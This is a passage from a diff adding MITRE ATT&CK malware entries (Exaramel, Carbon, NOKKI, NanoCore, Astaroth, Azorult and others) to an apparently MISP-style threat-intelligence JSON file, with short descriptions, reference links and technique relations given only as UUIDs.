"DarkComet - S0334" + }, + { + "description": "[Exaramel](https://attack.mitre.org/software/S0343) is multi-platform backdoor for Linux and Windows systems.(Citation: ESET TeleBots Oct 2018)", + "meta": { + "external_id": "S0343", + "mitre_platforms": [ + "Linux", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0343", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" + ], + "synonyms": [ + "Exaramel" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "051eaca1-958f-4091-9e5f-a9acd8f820b5", + "value": "Exaramel - S0343" + }, + { + "description": "[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)", + "meta": { + "external_id": "S0335", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0335", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/" + ], + "synonyms": [ + "Carbon" + ] + }, + "related": [ + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b7e9880a-7a7c-4162-bddb-e28e8ef2bf1f", + "value": "Carbon - S0335" + }, + { + "description": "[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)", + "meta": { + "external_id": "S0353", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0353", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ], + "synonyms": [ + "NOKKI" + ] + }, + "related": [ + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "071d5d65-83ec-4a55-acfa-be7d5f28ba9a", + "value": "NOKKI - S0353" + }, + { + "description": "[NanoCore](https://attack.mitre.org/software/S0336) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.(Citation: DigiTrust NanoCore Jan 2017)(Citation: Cofense NanoCore Mar 2018)(Citation: PaloAlto NanoCore Feb 2016)(Citation: Unit 42 Gorgon Group Aug 2018)", + "meta": { + "external_id": "S0336", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0336", + "https://www.digitrustgroup.com/nanocore-not-your-average-rat/", + "https://cofense.com/nanocore-rat-resurfaced-sewers/", + "https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ], + "synonyms": [ + "NanoCore" + ] + }, + "related": [ + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "value": "NanoCore - S0336" + }, + { + "description": "[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe and Brazil. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019) (Citation: Cofense Astaroth Sept 2018)", + "meta": { + "external_id": "S0373", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0373", + "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research", + "https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/" + ], + "synonyms": [ + "Astaroth" + ] + }, + "related": [ + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "edb24a93-1f7a-4bbf-a738-1397a14662c6", + "value": "Astaroth - S0373" + }, + { + "description": "[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)", + "meta": { + "external_id": "S0337", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0337", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/" + ], + "synonyms": [ + "BadPatch" + ] + }, + "related": [ + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "9af05de0-bc09-4511-a350-5eb8b06185c1", + "value": "BadPatch - S0337" + }, + { + "description": "[Micropsia](https://attack.mitre.org/software/S0339) is a remote access tool written in Delphi.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)", + "meta": { + "external_id": "S0339", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0339", + "https://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "https://blog.radware.com/security/2018/07/micropsia-malware/" + ], + "synonyms": [ + "Micropsia" + ] + }, + "related": [ + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "8c050cea-86e1-4b63-bf21-7af4fa483349", + "value": "Micropsia - S0339" + }, + { + "description": "[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.\nIn July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)", + "meta": { + "external_id": "S0344", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0344", + "https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ], + "synonyms": [ + "Azorult" + ] + }, + "related": [ + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "f9b05f33-d45d-4e4d-aafe-c208d38a0080", + "value": "Azorult - S0344" + }, + { + "description": "[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan.(Citation: Cybereason Oceanlotus May 2017)", + "meta": { + "external_id": "S0354", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0354", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ], + "synonyms": [ + "Denis" + ] + }, + "related": [ + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + 